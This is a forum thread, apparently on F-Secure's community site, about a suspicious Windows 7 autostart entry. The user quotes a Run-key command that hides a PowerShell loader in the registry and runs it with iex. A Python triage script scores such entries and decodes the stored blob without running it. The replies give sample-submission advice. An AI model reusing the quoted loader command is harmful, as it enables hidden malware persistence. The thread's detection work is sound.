
strange PowerShell script

tecnicogsn W/ Alumni Posts: 1 Security Scout

Dear Support,

Today I discovered a Windows 7 workstation that, during user access, was starting a strange PowerShell script.

Looking in the Run key of the registry I saw this string:


"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"


Looking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F I see this data.

(The byte data is much longer)

Could it be some kind of malware?

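The Run value quoted above is a fileless loader: rundll32 launches cmd, cmd starts a minimised PowerShell, and PowerShell reads a REG_BINARY blob from an HKCU key, converts it to ASCII and passes it to iex. The script below is an added example for triaging such entries; it is not code from the poster or from F-Secure. It scores exported Run-key values against the indicators visible in that one string and decodes a .reg-style hex blob into the text the loader would execute. The entry names, the OneDrive and sync.ps1 values and the hex blob are constructed sample data; only the cmstsitf command and its GUID path come from the post.

```python
"""Triage autostart entries for the registry-staged PowerShell loader pattern."""
import re
from dataclasses import dataclass

# Each indicator is one behaviour visible in the posted Run value.
INDICATORS = [
    ("rundll32 ShellExec_RunDLL launcher",
     re.compile(r"rundll32(\.exe)?\s+shell32\.dll\s*,\s*ShellExec_RunDLL", re.I)),
    ("PowerShell Invoke-Expression",
     re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("script body read from the registry",
     re.compile(r"Get-ItemProperty\s+['\"]?HK(CU|LM)", re.I)),
    ("byte-to-string decoding of the blob",
     re.compile(r"\[System\.Text\.Encoding\]::\w+\.GetString|FromBase64String", re.I)),
    ("window hidden or minimised at start",
     re.compile(r"start\s+/min|-w(indowstyle)?\s+hidden", re.I)),
]


@dataclass
class Finding:
    value_name: str
    score: int
    hits: list


def score_autorun(value_name, command):
    """Count how many loader indicators a single Run-key command matches."""
    hits = [label for label, rx in INDICATORS if rx.search(command)]
    return Finding(value_name, len(hits), hits)


def scan_run_key(entries, threshold=3):
    """entries: dict of value name -> command string, as exported from a Run key.
    Returns only the entries at or above the indicator threshold."""
    findings = [score_autorun(name, cmd) for name, cmd in entries.items()]
    return [f for f in findings if f.score >= threshold]


def decode_reg_binary(hex_blob):
    """Turn the comma-separated hex of a .reg REG_BINARY export (optionally with
    a 'hex:' prefix and backslash line continuations) into the ASCII text that
    [System.Text.Encoding]::ASCII.GetString would hand to iex."""
    blob = hex_blob.strip()
    if blob.lower().startswith("hex:"):
        blob = blob[4:]
    blob = blob.replace("\\\n", "")
    raw = bytes(int(b, 16) for b in blob.split(",") if b.strip())
    return raw.decode("ascii", errors="replace")


# Constructed sample Run key: two ordinary entries plus the posted loader,
# with the .reg escaping (\" and \\) already resolved to the real command.
SAMPLE_RUN_KEY = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "NightlySync": r"powershell -NoProfile -File C:\Scripts\sync.ps1",
    "cmstsitf": r"""rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))""",
}

# Constructed stand-in for the staged blob (the real one is not in the post).
SAMPLE_REG_BINARY = "hex:57,72,69,74,65,2d,48,6f,73,74,20,27,\\\n  64,65,6d,6f,27"

if __name__ == "__main__":
    for f in scan_run_key(SAMPLE_RUN_KEY):
        print(f"{f.value_name}: {f.score} indicators -> {', '.join(f.hits)}")
    print("staged script:", decode_reg_binary(SAMPLE_REG_BINARY))
```

Feed it the values of HKCU and HKLM ...\CurrentVersion\Run (and the RunOnce keys) from an exported .reg file; anything that reaches the threshold is worth pulling the referenced registry blob for, and decode_reg_binary lets you read that blob without ever executing it. The indicator list is deliberately small and tied to the one sample on this page, so treat a hit as a lead for the analyst, not as a verdict.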

  • JamesC
    JamesC W/ Partner, W/ Staff, W/ Moderator Posts: 526 Moderator

    Hi tecnicogsn


    If you suspect that:
    • A clean file has been falsely detected as malicious, or;
    • A file that is malicious but has not been detected by our software
    You can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link:
    1. Select the File Sample tab.
    2. Click Choose File, and attach your sample file.
      • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
      • Note: Subject and description should be written in English.
    3. Verify that you are not a robot with reCAPTCHA.
    4. Click Submit sample file.
    The sample submission is analyzed by our analysts and databases, and is updated if necessary.

    For more information on how you can submit a sample, read our Community article here.
  • etomcat
    etomcat W/ Alumni Posts: 1,172 Firewall Master



    I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.


    Best Regards: Tamas Feher, Hungary.

This discussion has been closed.